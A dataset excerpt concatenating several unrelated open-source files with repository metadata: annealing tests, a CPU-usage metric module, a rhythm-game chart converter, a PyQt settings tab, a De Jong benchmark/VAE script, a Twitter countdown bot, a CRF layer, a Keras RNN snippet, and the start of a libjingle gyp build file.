)
def test_anneal_minimize_keeps_when_worse_and_discarded():
assert (
optimization.anneal_minimize(
'initial',
lambda s: 0.0 if s == 'initial' else 1.0,
lambda s: 'better',
lambda: 0.9,
1.0,
0.5,
0.5,
1,
)
== 'initial'
)
def test_anneal_minimize_raises_when_wrong_cooling_factor():
with pytest.raises(ValueError):
optimization.anneal_minimize(
'initial',
lambda s: 1.0 if s == 'initial' else 0.0,
lambda s: 'better',
lambda: 1.0,
1.0,
0.5,
2.0,
1,
)
def test_anneal_minimize_calls_trace_func():
trace_func = mock.Mock()
optimization.anneal_minimize(
'initial',
lambda s: 1.0 if s == 'initial' else 0.0,
lambda s: 'better',
lambda: 1.0,
1.0,
0.5,
0.5,
1,
trace_func=trace_func,
)
trace_func.assert_has_calls(
[mock.call('initial', 1.0, 1.0, 1.0, True), mock.call('better', 1.0, 0.0, 1.0, True)]
)
| 27.175926 | 93 | 0.59523 |
bc7369567f19c2580ddb182671193f0f800fe55b | 9,638 | py | Python | avalanche/evaluation/metrics/cpu_usage.py | coreylowman/avalanche | 9c1e7765f1577c400ec0c57260221bcffd9566a2 | [
"MIT"
] | 1 | 2021-12-26T21:08:19.000Z | 2021-12-26T21:08:19.000Z | avalanche/evaluation/metrics/cpu_usage.py | coreylowman/avalanche | 9c1e7765f1577c400ec0c57260221bcffd9566a2 | [
"MIT"
] | null | null | null | avalanche/evaluation/metrics/cpu_usage.py | coreylowman/avalanche | 9c1e7765f1577c400ec0c57260221bcffd9566a2 | [
"MIT"
] | null | null | null | ################################################################################
# Copyright (c) 2021 ContinualAI. #
# Copyrights licensed under the MIT License. #
# See the accompanying LICENSE file for terms. #
# #
# Date: 19-01-2021 #
# Author(s): Lorenzo Pellegrini #
# E-mail: contact@continualai.org #
# Website: www.continualai.org #
################################################################################
import os
import warnings
from typing import Optional, List
from psutil import Process
from avalanche.evaluation import Metric, PluginMetric, GenericPluginMetric
from avalanche.evaluation.metrics import Mean
class CPUUsage(Metric[float]):
"""
The standalone CPU usage metric.
Instances of this metric compute the average CPU usage as a float value.
The metric starts tracking the CPU usage when the `update` method is called
for the first time. That is, the tracking does not start at the time the
constructor is invoked.
Calling the `update` method more than twice will update the metric to the
average usage between the first and the last call to `update`.
The result, obtained using the `result` method, is the usage computed
as stated above.
The reset method will bring the metric to its initial state. By default
this metric in its initial state will return an usage value of 0.
"""
def __init__(self):
"""
Creates an instance of the standalone CPU usage metric.
By default this metric in its initial state will return a CPU usage
value of 0. The metric can be updated by using the `update` method
while the average CPU usage can be retrieved using the `result` method.
"""
self._mean_usage = Mean()
"""
The mean utility that will be used to store the average usage.
"""
self._process_handle: Optional[Process] = None
"""
The process handle, lazily initialized.
"""
self._first_update = True
"""
An internal flag to keep track of the first call to the `update` method.
"""
def update(self) -> None:
"""
Update the running CPU usage.
For more info on how to set the starting moment see the class
description.
:return: None.
"""
if self._first_update:
self._process_handle = Process(os.getpid())
last_time = getattr(self._process_handle, "_last_sys_cpu_times", None)
utilization = self._process_handle.cpu_percent()
current_time = getattr(
self._process_handle, "_last_sys_cpu_times", None
)
if self._first_update:
self._first_update = False
else:
if current_time is None or last_time is None:
warnings.warn(
"CPUUsage can't detect the elapsed time. It is "
"recommended to update avalanche to the latest "
"version."
)
# Fallback, shouldn't happen
current_time = 1.0
last_time = 0.0
self._mean_usage.update(utilization, current_time - last_time)
def result(self) -> float:
"""
Retrieves the average CPU usage.
Calling this method will not change the internal state of the metric.
:return: The average CPU usage, as a float value.
"""
return self._mean_usage.result()
def reset(self) -> None:
"""
Resets the metric.
:return: None.
"""
self._mean_usage.reset()
self._process_handle = None
self._first_update = True
class CPUPluginMetric(GenericPluginMetric[float]):
def __init__(self, reset_at, emit_at, mode):
self._cpu = CPUUsage()
super(CPUPluginMetric, self).__init__(
self._cpu, reset_at=reset_at, emit_at=emit_at, mode=mode
)
def update(self, strategy):
self._cpu.update()
class MinibatchCPUUsage(CPUPluginMetric):
"""
The minibatch CPU usage metric.
This plugin metric only works at training time.
This metric "logs" the CPU usage for each iteration.
If a more coarse-grained logging is needed, consider using
:class:`EpochCPUUsage`.
"""
def __init__(self):
"""
Creates an instance of the minibatch CPU usage metric.
"""
super(MinibatchCPUUsage, self).__init__(
reset_at="iteration", emit_at="iteration", mode="train"
)
def before_training_iteration(self, strategy):
super().before_training_iteration(strategy)
self.update(strategy) # start monitoring thread
def __str__(self):
return "CPUUsage_MB"
class EpochCPUUsage(CPUPluginMetric):
"""
The Epoch CPU usage metric.
This plugin metric only works at training time.
The average usage will be logged after each epoch.
"""
def __init__(self):
"""
Creates an instance of the epoch CPU usage metric.
"""
super(EpochCPUUsage, self).__init__(
reset_at="epoch", emit_at="epoch", mode="train"
)
def before_training_epoch(self, strategy):
super().before_training_epoch(strategy)
self.update(strategy) # start monitoring thread
def __str__(self):
return "CPUUsage_Epoch"
class RunningEpochCPUUsage(CPUPluginMetric):
"""
The running epoch CPU usage metric.
This plugin metric only works at training time
After each iteration, the metric logs the average CPU usage up
to the current epoch iteration.
"""
def __init__(self):
"""
Creates an instance of the average epoch cpu usage metric.
"""
self._mean = Mean()
super(RunningEpochCPUUsage, self).__init__(
reset_at="epoch", emit_at="iteration", mode="train"
)
def result(self, strategy) -> float:
return self._mean.result()
def before_training_epoch(self, strategy):
super().before_training_epoch(strategy)
self._mean.reset()
def before_training_iteration(self, strategy):
super().before_training_iteration(strategy)
self.update(strategy) # start monitoring thread
def after_training_iteration(self, strategy):
super().after_training_iteration(strategy)
self.update(strategy)
self._mean.update(self._cpu.result())
self._cpu.reset()
return self._package_result(strategy)
def __str__(self):
return "RunningCPUUsage_Epoch"
class ExperienceCPUUsage(CPUPluginMetric):
"""
The average experience CPU usage metric.
This plugin metric works only at eval time.
After each experience, this metric emits the average CPU usage on that
experience.
"""
def __init__(self):
"""
Creates an instance of the experience CPU usage metric.
"""
super(ExperienceCPUUsage, self).__init__(
reset_at="experience", emit_at="experience", mode="eval"
)
def before_eval_exp(self, strategy):
super().before_eval_exp(strategy)
self.update(strategy) # start monitoring thread
def __str__(self):
return "CPUUsage_Exp"
class StreamCPUUsage(CPUPluginMetric):
"""
The average stream CPU usage metric.
This plugin metric works only at eval time.
After the entire evaluation stream, this metric emits
the average CPU usage on all experiences.
"""
def __init__(self):
"""
Creates an instance of the stream CPU usage metric.
"""
super(StreamCPUUsage, self).__init__(
reset_at="stream", emit_at="stream", mode="eval"
)
def before_eval(self, strategy):
super().before_eval(strategy)
self.update(strategy) # start monitoring thread
def __str__(self):
return "CPUUsage_Stream"
def cpu_usage_metrics(
*,
minibatch=False,
epoch=False,
epoch_running=False,
experience=False,
stream=False
) -> List[PluginMetric]:
"""
Helper method that can be used to obtain the desired set of
plugin metrics.
:param minibatch: If True, will return a metric able to log the minibatch
CPU usage
:param epoch: If True, will return a metric able to log the epoch
CPU usage
:param epoch_running: If True, will return a metric able to log the running
epoch CPU usage.
:param experience: If True, will return a metric able to log the experience
CPU usage.
:param stream: If True, will return a metric able to log the evaluation
stream CPU usage.
:return: A list of plugin metrics.
"""
metrics = []
if minibatch:
metrics.append(MinibatchCPUUsage())
if epoch:
metrics.append(EpochCPUUsage())
if epoch_running:
metrics.append(RunningEpochCPUUsage())
if experience:
metrics.append(ExperienceCPUUsage())
if stream:
metrics.append(StreamCPUUsage())
return metrics
__all__ = [
"CPUUsage",
"MinibatchCPUUsage",
"EpochCPUUsage",
"RunningEpochCPUUsage",
"ExperienceCPUUsage",
"StreamCPUUsage",
"cpu_usage_metrics",
]
| 29.655385 | 80 | 0.60469 |
930614da5510462a3ca06b6addc7183f604a8b9e | 1,220 | py | Python | reamber/algorithms/convert/BMSToSM.py | Eve-ning/reamber_base_py | 6d19c84f2c110b60e633b82b73e0516396466f56 | [
"MIT"
] | 10 | 2020-06-28T11:16:36.000Z | 2021-08-09T21:41:43.000Z | reamber/algorithms/convert/BMSToSM.py | Eve-ning/reamberPy | 6d19c84f2c110b60e633b82b73e0516396466f56 | [
"MIT"
] | 35 | 2020-06-18T13:05:50.000Z | 2022-02-18T10:13:35.000Z | reamber/algorithms/convert/BMSToSM.py | Eve-ning/reamber_base_py | 6d19c84f2c110b60e633b82b73e0516396466f56 | [
"MIT"
] | 2 | 2021-05-26T17:05:06.000Z | 2021-06-12T18:42:13.000Z | from unidecode import unidecode
from reamber.algorithms.convert.ConvertBase import ConvertBase
from reamber.bms.BMSMap import BMSMap
from reamber.sm.SMMap import SMMap
from reamber.sm.SMMapMeta import SMMapChartTypes
from reamber.sm.SMMapSet import SMMapSet
from reamber.sm.lists.SMBpmList import SMBpmList
from reamber.sm.lists.notes.SMHitList import SMHitList
from reamber.sm.lists.notes.SMHoldList import SMHoldList
class BMSToSM(ConvertBase):
@classmethod
def convert(cls, bms: BMSMap) -> SMMapSet:
""" Converts a Mapset to multiple SM maps """
sm = SMMap()
sm.hits = cls.cast(bms.hits, SMHitList, dict(offset='offset', column='column'))
sm.holds = cls.cast(bms.holds, SMHoldList, dict(offset='offset', column='column', length='length'))
sm.bpms = cls.cast(bms.bpms, SMBpmList, dict(offset='offset', bpm='bpm'))
sm.description = unidecode(bms.version.decode('sjis'))
sm.chart_type = SMMapChartTypes.get_type(bms.stack().column.max() + 1)
sms = SMMapSet()
sms.maps = [sm]
sms.title = unidecode(bms.title.decode('sjis'))
sms.artist = unidecode(bms.artist.decode('sjis'))
sms.offset = 0.0
return sms
| 36.969697 | 107 | 0.696721 |
3ca4c849549cb72bb779265199e30c175a78b3ef | 3,017 | py | Python | app/lpd/gui/main_evr_tab.py | stfc-aeg/lpd-detector | 7bc0d9700a3d3992a4541f05e1434aba0d056dcc | [
"Apache-2.0"
] | null | null | null | app/lpd/gui/main_evr_tab.py | stfc-aeg/lpd-detector | 7bc0d9700a3d3992a4541f05e1434aba0d056dcc | [
"Apache-2.0"
] | 20 | 2018-10-04T07:36:22.000Z | 2020-05-18T13:10:42.000Z | app/lpd/gui/main_evr_tab.py | stfc-aeg/lpd-detector | 7bc0d9700a3d3992a4541f05e1434aba0d056dcc | [
"Apache-2.0"
] | null | null | null |
from PyQt4 import QtCore, QtGui
import time
import sys
from functools import partial
class LpdFemGuiMainEvrTab(object):
'''
Helper class to manage EVR tab in main window
'''
def __init__(self, app_main, mainWindow):
'''
Constructor
'''
self.app_main = app_main
self.mainWindow = mainWindow
self.ui = mainWindow.ui
self.msgPrint = self.mainWindow.msgPrint
# Initialise default fields based on app_main object cached parameters
self.ui.evrMcastGroupEdit.setText(self.app_main.getCachedParam('evrMcastGroup'))
self.ui.evrMcastPortEdit.setText(str(self.app_main.getCachedParam('evrMcastPort')))
self.ui.evrMcastInterfaceEdit.setText(self.app_main.getCachedParam('evrMcastInterface'))
if self.app_main.getCachedParam('evrRecordEnable') == True:
self.ui.evrRecordEnableSel.setCheckState(QtCore.Qt.Checked)
else:
self.ui.evrRecordEnableSel.setCheckState(QtCore.Qt.Unchecked)
# Connect signals and slots
QtCore.QObject.connect(self.ui.evrMcastGroupEdit, QtCore.SIGNAL("editingFinished()"), self.evrMcastGroupUpdate)
QtCore.QObject.connect(self.ui.evrMcastPortEdit, QtCore.SIGNAL("editingFinished()"), self.evrMcastPortUpdate)
QtCore.QObject.connect(self.ui.evrMcastInterfaceEdit, QtCore.SIGNAL("editingFinished()"), self.evrMcastInterfaceUpdate)
QtCore.QObject.connect(self.ui.evrRecordEnableSel, QtCore.SIGNAL("toggled(bool)"), self.evrRecordSelect)
def updateEnabledWidgets(self):
pass
def evrMcastGroupUpdate(self):
evrMcastGroup = self.ui.evrMcastGroupEdit.text()
try:
evrMcastGroupStr = str(evrMcastGroup)
self.app_main.setCachedParam('evrMcastGroup', evrMcastGroupStr)
self.mainWindow.updateEnabledWidgets()
except ValueError:
self.ui.evrMcastGroupEdit.setText(self.app_main.getCachedParam('evrMcastGroup'))
def evrMcastPortUpdate(self):
evrMcastPort = self.ui.evrMcastPortEdit.text()
try:
evrMcastPortVal = int(evrMcastPort)
self.app_main.setCachedParam('evrMcastPort', evrMcastPortVal)
self.mainWindow.updateEnabledWidgets()
except ValueError:
self.ui.evrMcastPortEdit.setText(str(self.app_main.getCachedParam('evrMcastPort')))
def evrMcastInterfaceUpdate(self):
evrMcastInterface = self.ui.evrMcastInterfaceEdit.text()
try:
evrMcastInterfaceStr = str(evrMcastInterface)
self.app_main.setCachedParam('evrMcastInterface', evrMcastInterfaceStr)
self.mainWindow.updateEnabledWidgets()
except ValueError:
self.ui.evrMcastInterfaceEdit.setText(self.app_main.getCachedParam('evrMcastInterface'))
def evrRecordSelect(self, state):
self.app_main.setCachedParam('evrRecordEnable', state)
self.mainWindow.updateEnabledWidgets()
| 41.328767 | 127 | 0.695061 |
cd11b3d705fa17cb1fc16ee97eb5ee27977ffb57 | 3,171 | py | Python | coilfm/dejong.py | anon-coil/coil_gecco | 6b8aa410a944e1db26c3acdc77af71b3b5d4fe74 | [
"MIT"
] | 2 | 2022-02-15T08:39:26.000Z | 2022-02-17T11:51:06.000Z | coilfm/dejong.py | anon-coil/coil_gecco | 6b8aa410a944e1db26c3acdc77af71b3b5d4fe74 | [
"MIT"
] | null | null | null | coilfm/dejong.py | anon-coil/coil_gecco | 6b8aa410a944e1db26c3acdc77af71b3b5d4fe74 | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
# Benchmark function
def dejong5(X1, X2):
n_vals = len(X1)
Y = np.full( (n_vals), np.nan)
for i in range(n_vals):
x1, x2 = X1[i], X2[i]
total = 0
A = np.zeros((2,25))
a = np.array([-32, -16, 0, 16, 32])
A[0,:] = np.tile(a,(1,5))
A[1,:] = np.sort(np.tile(a,(1,5)))
for ii in range(25):
a1i = A[0,ii]
a2i = A[1,ii]
term1 = ii+1
term2 = (x1 - a1i) ** 6
term3 = (x2 - a2i) ** 6
new = 1 / (term1 + term2 + term3)
total += new
Y[i] = y = 1 / (0.002 + total)
return Y
# As a constraint only
def dejong_constraint(X1,X2, threshold=445):
""" 1) Expected Range of [-50 to 50]
2) Optima (0,0) in invalid region
"""
# Scale
zoom = .39
_x1 = X1*zoom
_x2 = X2*zoom
# Rotate
theta = np.radians(-33)
c, s = np.cos(theta), np.sin(theta)
R = np.array(((c, -s), (s, c)))
_x1, _x2 = R@np.array([_x1, _x2])
# Translate
_x1 += 9
_x2 += -3
# Evaluate
valid = (dejong5(_x1, _x2) < threshold)
return valid
def create_dataset(random=False, res=100, n_samples=1000):
# Collect dataset of valid solutions
abs_range = 50
if random:
x = (2*(np.random.rand(n_samples)-0.5)) * abs_range
y = (2*(np.random.rand(n_samples)-0.5)) * abs_range
Z = dejong_constraint(x,y)
pts = np.c_[x,y]
else:
x = np.linspace(-abs_range, abs_range, res)
y = np.linspace(-abs_range, abs_range, res)
X, Y = np.meshgrid(x, y) # grid of point
Z = dejong_constraint(X.flatten(), Y.flatten())
pts = np.c_[X.flatten(),Y.flatten()]
valid_pts = pts[Z,:]
return valid_pts
def main():
"Saves valid dataset as 'dejong_dataset.csv' "
n_samples = 5000
valid_pts = create_dataset(random=True)
training_set = [valid_pts]
while len(np.vstack(training_set)) < n_samples:
valid_pts = create_dataset(random=True)
training_set += [valid_pts]
training_set = np.vstack(training_set)
training_set = training_set[:n_samples]
np.savetxt('dejong_dataset.csv', training_set)
# Visualize
fig, ax = plt.subplots(figsize=(4, 4))
ax.scatter(training_set[:,0], training_set[:,1], s=1)
ax.scatter(0,0,c='r',s=80)
ax.set(xlim=[-51,51], ylim=[-51,51])
fig.savefig('dejong_valid_solutions.png')
print(f'[*] Done: {len(training_set)} data points created')
## -- Train Classic VAE -- #
print('\n[*] Training VAE')
# Taken from vae_datagen
from vae_basic import VecVAE, train_vae
from sklearn import preprocessing
raw_data = training_set
scaler = preprocessing.StandardScaler().fit(raw_data) # zero mean unit standard deviation
genomes = scaler.transform(raw_data)
n_dim, n_latent, n_epochs = genomes.shape[1], 2, 1000
vae = VecVAE(n_dim, n_latent)
vae = train_vae(genomes, vae, n_epochs, view_mod=25)
vae.save('dejong_vae.pt')
if __name__ == "__main__":
main()
| 26.206612 | 93 | 0.568906 |
76eb4479782fb12f3d172e69146d8c65533dba89 | 2,413 | py | Python | my_christmas_bot.py | gastonginestet/christmas_bot | e90c01c8b1c91414560a6969125c98d8adaa28af | [
"MIT"
] | 1 | 2020-12-02T04:32:35.000Z | 2020-12-02T04:32:35.000Z | my_christmas_bot.py | gastonginestet/christmas_bot | e90c01c8b1c91414560a6969125c98d8adaa28af | [
"MIT"
] | null | null | null | my_christmas_bot.py | gastonginestet/christmas_bot | e90c01c8b1c91414560a6969125c98d8adaa28af | [
"MIT"
] | null | null | null | #! python
import tweepy
import time
import datetime
CONSUMER_KEY = 'your_consumer_key'
CONSUMER_SECRET = 'your_consumer_secret'
ACCESS_KEY = 'your_access_key :)'
ACCESS_SECRET = 'your_access_secret :O'
auth = tweepy.OAuthHandler(CONSUMER_KEY,CONSUMER_SECRET)
auth.set_access_token(ACCESS_KEY, ACCESS_SECRET)
api = tweepy.API(auth)
FILE_NAME = 'last_seen_id.txt'
def countdown_until_christmas():
present = datetime.datetime.now()
future = datetime.datetime(2020, 12, 24, 21, 0, 0)
difference = future - present
minutes = difference.total_seconds() / 60
hours = minutes / 60
message='Para Nochebuena falta ' + str(int(difference.days)) + ' dias, ' + str(int(hours)) + ' horas, ' + str(int(minutes)) + ' minutos.'
return message
message=str(countdown_until_christmas())
print(message)
def retrieve_last_seen_id(file_name):
f_read = open(file_name, 'r')
last_seen_id = int(f_read.read().strip())
f_read.close()
return last_seen_id
def store_last_seen_id(last_seen_id, file_name):
f_write = open(file_name, 'w')
f_write.write(str(last_seen_id))
f_write.close()
return
def retrieve_actual_date(file_name):
f_read = open(file_name, 'r')
last_seen_id = int(f_read.read().strip())
f_read.close()
return last_seen_id
def store_actual_date(last_seen_id, file_name):
f_write = open(file_name, 'w')
f_write.write(str(last_seen_id))
f_write.close()
return
def reply_totweets():
print('Retrieving and replying to tweets...')
last_seen_id = retrieve_last_seen_id(FILE_NAME)
# usar 1189312810599243777
mentions = api.mentions_timeline(
last_seen_id,
tweet_mode='extended')
for mention in reversed(mentions):
print(mention.user.screen_name + ' - ' + mention.full_text)
print(mention.created_at)
print(mention.id)
print(' ')
last_seen_id = mention.id
store_last_seen_id(last_seen_id, FILE_NAME)
if '#cuantofalta' in mention.full_text.lower():
print('found #cuantofalta!')
print('responding back...')
message=str(countdown_until_christmas())
print(mention.id)
api.update_status('@'+ mention.user.screen_name + ' Hola ' +mention.user.name +'!! '+ message, mention.id )
while True:
reply_totweets()
time.sleep(10)
| 29.426829 | 141 | 0.668877 |
43f2ba32e0833f6f4f10d9baae6b60c81b694863 | 647 | py | Python | blender/arm/logicnode/canvas_get_location.py | Sanva/armory | 61b2d008e3b73bd978966b3209b646d162923e18 | [
"Zlib"
] | null | null | null | blender/arm/logicnode/canvas_get_location.py | Sanva/armory | 61b2d008e3b73bd978966b3209b646d162923e18 | [
"Zlib"
] | null | null | null | blender/arm/logicnode/canvas_get_location.py | Sanva/armory | 61b2d008e3b73bd978966b3209b646d162923e18 | [
"Zlib"
] | null | null | null | import bpy
from bpy.props import *
from bpy.types import Node, NodeSocket
from arm.logicnode.arm_nodes import *
class CanvasGetLocationNode(Node, ArmLogicTreeNode):
'''Get canvas element location'''
bl_idname = 'LNCanvasGetLocationNode'
bl_label = 'Canvas Get Location'
bl_icon = 'NONE'
def init(self, context):
self.inputs.new('ArmNodeSocketAction', 'In')
self.inputs.new('NodeSocketString', 'Element')
self.outputs.new('ArmNodeSocketAction', 'Out')
self.outputs.new('NodeSocketFloat', 'X')
self.outputs.new('NodeSocketFloat', 'Y')
add_node(CanvasGetLocationNode, category='Canvas')
| 32.35 | 54 | 0.703246 |
cc4b16cc80ed29530fcd59249b5ea55352490468 | 4,527 | py | Python | nlplingo/oregon/event_models/uoregon/layers/crf.py | BBN-E/nlplingo | 32ff17b1320937faa3d3ebe727032f4b3e7a353d | [
"Apache-2.0"
] | 3 | 2020-10-22T13:28:00.000Z | 2022-03-24T19:57:22.000Z | nlplingo/oregon/event_models/uoregon/layers/crf.py | BBN-E/nlplingo | 32ff17b1320937faa3d3ebe727032f4b3e7a353d | [
"Apache-2.0"
] | null | null | null | nlplingo/oregon/event_models/uoregon/layers/crf.py | BBN-E/nlplingo | 32ff17b1320937faa3d3ebe727032f4b3e7a353d | [
"Apache-2.0"
] | 1 | 2020-10-22T13:29:51.000Z | 2020-10-22T13:29:51.000Z | import torch.nn as nn
import torch
class CRF(nn.Module):
def __init__(self, tag_map, opt):
super().__init__()
self.opt = opt
self.tag_map = tag_map
self.num_tags = len(tag_map)
# matrix of transition scores from j to i
self.trans = nn.Parameter(torch.randn(self.num_tags, self.num_tags))
self.trans.data[tag_map["<SOS>"], :] = -10000 # no transition to SOS
self.trans.data[:, tag_map["<EOS>"]] = -10000 # no transition from EOS except to PAD
self.trans.data[:, tag_map["<PAD>"]] = -10000 # no transition from PAD except to PAD
self.trans.data[tag_map["<PAD>"], :] = -10000 # no transition to PAD except from EOS
self.trans.data[tag_map["<PAD>"], tag_map["<EOS>"]] = 0
self.trans.data[tag_map["<PAD>"], tag_map["<PAD>"]] = 0
def forward(self, h, mask): # forward algorithm
# initialize forward variables in log space
batch_size, _, _ = h.shape
score = torch.Tensor(batch_size, self.num_tags).fill_(-10000).to(self.opt['device']) # [B, C]
score[:, self.tag_map["<SOS>"]] = 0.
trans = self.trans.unsqueeze(0) # [1, C, C]
for t in range(h.size(1)): # recursion through the sequence
mask_t = mask[:, t].unsqueeze(1)
emit_t = h[:, t].unsqueeze(2) # [B, C, 1]
score_t = score.unsqueeze(1) + emit_t + trans # [B, 1, C] -> [B, C, C]
score_t = log_sum_exp(score_t) # [B, C, C] -> [B, C]
score = score_t * mask_t + score * (1 - mask_t)
score = log_sum_exp(score + self.trans[self.tag_map["<EOS>"]])
return score # partition function
def score(self, h, y0, mask): # calculate the score of a given sequence
batch_size, _, _ = h.shape
score = torch.Tensor(batch_size).fill_(0.).to(self.opt['device'])
h = h.unsqueeze(3)
trans = self.trans.unsqueeze(2)
for t in range(h.size(1)): # recursion through the sequence
mask_t = mask[:, t]
emit_t = torch.cat([h[t, y0[t + 1]] for h, y0 in zip(h, y0)])
trans_t = torch.cat([trans[y0[t + 1], y0[t]] for y0 in y0])
score += (emit_t + trans_t) * mask_t
last_tag = y0.gather(1, mask.sum(1).long().unsqueeze(1)).squeeze(1)
score += self.trans[self.tag_map["<EOS>"], last_tag]
return score
def decode(self, h, mask): # Viterbi decoding
# initialize backpointers and viterbi variables in log space
batch_size, seq_len, _ = h.shape
bptr = torch.Tensor().long().to(self.opt['device'])
score = torch.Tensor(batch_size, self.num_tags).fill_(-10000).to(self.opt['device'])
score[:, self.tag_map["<SOS>"]] = 0.
for t in range(h.size(1)): # recursion through the sequence
mask_t = mask[:, t].unsqueeze(1)
score_t = score.unsqueeze(1) + self.trans # [B, 1, C] -> [B, C, C]
score_t, bptr_t = score_t.max(2) # best previous scores and tags
score_t += h[:, t] # plus emission scores
bptr = torch.cat((bptr, bptr_t.unsqueeze(1)), 1)
score = score_t * mask_t + score * (1 - mask_t)
score += self.trans[self.tag_map["<EOS>"]]
best_score, best_tag = torch.max(score, 1)
# back-tracking
bptr = bptr.tolist()
best_path = [[i] for i in best_tag.tolist()]
for b in range(batch_size):
i = best_tag[b] # best tag
j = int(mask[b].sum().item())
for bptr_t in reversed(bptr[b][:j]):
i = bptr_t[i]
best_path[b].append(i)
best_path[b].pop()
best_path[b].reverse()
padded_path = []
for b in range(batch_size):
padded_path.append(
best_path[b] + [self.tag_map["<PAD>"]] * (seq_len - len(best_path[b]))
)
padded_path = torch.Tensor(padded_path).long().to(self.opt['device'])
return padded_path
def preds_to_tags(batch_preds, mask, tag_map):
'''
preds.shape = batch size, seq len
'''
inverse_map = dict([(v, k) for k, v in tag_map.items()])
lengths = torch.sum(mask, dim=-1).data.cpu().numpy()
batch_size, seq_len = batch_preds.shape
batch_preds = batch_preds.data.cpu().numpy()
tags = []
for b_id in range(batch_size):
preds = batch_preds[b_id][:lengths[b_id]]
def log_sum_exp(x):
m = torch.max(x, -1)[0]
return m + torch.log(torch.sum(torch.exp(x - m.unsqueeze(-1)), -1))
| 44.382353 | 102 | 0.567263 |
54e1a17ba3c3233970cb4c4404275f5d2aebf831 | 454 | py | Python | Chapter 3/rnn_example.py | PacktPublishing/Machine-Learning-Model-Serving-Patterns-and-Best-Practices | 390ae5868e023f0e417f5dca23eab69e848c5f91 | [
"MIT"
] | null | null | null | Chapter 3/rnn_example.py | PacktPublishing/Machine-Learning-Model-Serving-Patterns-and-Best-Practices | 390ae5868e023f0e417f5dca23eab69e848c5f91 | [
"MIT"
] | null | null | null | Chapter 3/rnn_example.py | PacktPublishing/Machine-Learning-Model-Serving-Patterns-and-Best-Practices | 390ae5868e023f0e417f5dca23eab69e848c5f91 | [
"MIT"
] | null | null | null | import numpy as np
import tensorflow as tf
from tensorflow import keras
from tensorflow.keras import layers
model = keras.Sequential()
# Add an Embedding layer expecting input vocab of size 1000, and
# output embedding dimension of size 64.
model.add(layers.Embedding(input_dim=1000, output_dim=64))
# Add a LSTM layer with 128 internal units.
model.add(layers.LSTM(128))
# Add a Dense layer with 10 units.
model.add(layers.Dense(10))
model.summary() | 26.705882 | 64 | 0.779736 |
1051fb1e31c8ce082760a089204cd3e4a850eb14 | 42,593 | gyp | Python | src/third_party/libjingle/libjingle.gyp | jxjnjjn/chromium | 435c1d02fd1b99001dc9e1e831632c894523580d | [
"Apache-2.0"
] | 9 | 2018-09-21T05:36:12.000Z | 2021-11-15T15:14:36.000Z | src/third_party/libjingle/libjingle.gyp | jxjnjjn/chromium | 435c1d02fd1b99001dc9e1e831632c894523580d | [
"Apache-2.0"
] | null | null | null | src/third_party/libjingle/libjingle.gyp | jxjnjjn/chromium | 435c1d02fd1b99001dc9e1e831632c894523580d | [
"Apache-2.0"
] | 3 | 2018-11-28T14:54:13.000Z | 2020-07-02T07:36:07.000Z | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'includes': [
'../../build/win_precompile.gypi',
],
'variables': {
'enabled_libjingle_device_manager%': 0,
'libjingle_additional_deps%': [],
'libjingle_peerconnection_additional_deps%': [],
'libjingle_source%': "source",
'libpeer_target_type%': 'static_library',
'libpeer_allocator_shim%': 0,
},
'target_defaults': {
'defines': [
'EXPAT_RELATIVE_PATH',
'FEATURE_ENABLE_SSL',
'GTEST_RELATIVE_PATH',
'HAVE_SRTP',
'HAVE_WEBRTC_VIDEO',
'HAVE_WEBRTC_VOICE',
'JSONCPP_RELATIVE_PATH',
'LOGGING_INSIDE_LIBJINGLE',
'NO_MAIN_THREAD_WRAPPING',
'NO_SOUND_SYSTEM',
'SRTP_RELATIVE_PATH',
'USE_WEBRTC_DEV_BRANCH',
],
'configurations': {
'Debug': {
'defines': [
# TODO(sergeyu): Fix libjingle to use NDEBUG instead of
# _DEBUG and remove this define. See below as well.
'_DEBUG',
],
}
},
'include_dirs': [
'./overrides',
'./<(libjingle_source)',
'../../testing/gtest/include',
'../../third_party',
'../../third_party/libyuv/include',
'../../third_party/webrtc',
],
'dependencies': [
'<(DEPTH)/base/base.gyp:base',
'<(DEPTH)/net/net.gyp:net',
'<(DEPTH)/third_party/expat/expat.gyp:expat',
],
'export_dependent_settings': [
'<(DEPTH)/third_party/expat/expat.gyp:expat',
],
'direct_dependent_settings': {
'include_dirs': [
'./overrides',
'./<(libjingle_source)',
'../../testing/gtest/include',
'../../third_party',
'../../third_party/webrtc',
],
'defines': [
'FEATURE_ENABLE_SSL',
'FEATURE_ENABLE_VOICEMAIL',
'EXPAT_RELATIVE_PATH',
'GTEST_RELATIVE_PATH',
'JSONCPP_RELATIVE_PATH',
'NO_MAIN_THREAD_WRAPPING',
'NO_SOUND_SYSTEM',
],
'conditions': [
['OS=="win"', {
'link_settings': {
'libraries': [
'-lsecur32.lib',
'-lcrypt32.lib',
'-liphlpapi.lib',
],
},
}],
['OS=="win"', {
'include_dirs': [
'../third_party/platformsdk_win7/files/Include',
],
'defines': [
'_CRT_SECURE_NO_WARNINGS', # Suppres warnings about _vsnprinf
],
# TODO(jschuh): crbug.com/167187 fix size_t to int truncations.
'msvs_disabled_warnings': [ 4267 ],
}],
['OS=="linux"', {
'defines': [
'LINUX',
],
}],
['OS=="mac"', {
'defines': [
'OSX',
],
}],
['OS=="android"', {
'defines': [
'ANDROID',
],
}],
['os_posix == 1', {
'defines': [
'POSIX',
],
}],
['os_bsd==1', {
'defines': [
'BSD',
],
}],
['OS=="openbsd"', {
'defines': [
'OPENBSD',
],
}],
['OS=="freebsd"', {
'defines': [
'FREEBSD',
],
}],
],
},
'all_dependent_settings': {
'configurations': {
'Debug': {
'defines': [
# TODO(sergeyu): Fix libjingle to use NDEBUG instead of
# _DEBUG and remove this define. See above as well.
'_DEBUG',
],
}
},
},
'conditions': [
['"<(libpeer_target_type)"=="static_library"', {
'defines': [ 'LIBPEERCONNECTION_LIB=1' ],
}],
['use_openssl==1', {
'defines': [
'SSL_USE_OPENSSL',
'HAVE_OPENSSL_SSL_H',
],
'dependencies': [
'../../third_party/openssl/openssl.gyp:openssl',
],
}, {
'defines': [
'SSL_USE_NSS',
'HAVE_NSS_SSL_H',
'SSL_USE_NSS_RNG',
],
'conditions': [
['os_posix == 1 and OS != "mac" and OS != "ios" and OS != "android"', {
'dependencies': [
'<(DEPTH)/build/linux/system.gyp:ssl',
],
}],
['OS == "mac" or OS == "ios" or OS == "win"', {
'dependencies': [
'<(DEPTH)/net/third_party/nss/ssl.gyp:libssl',
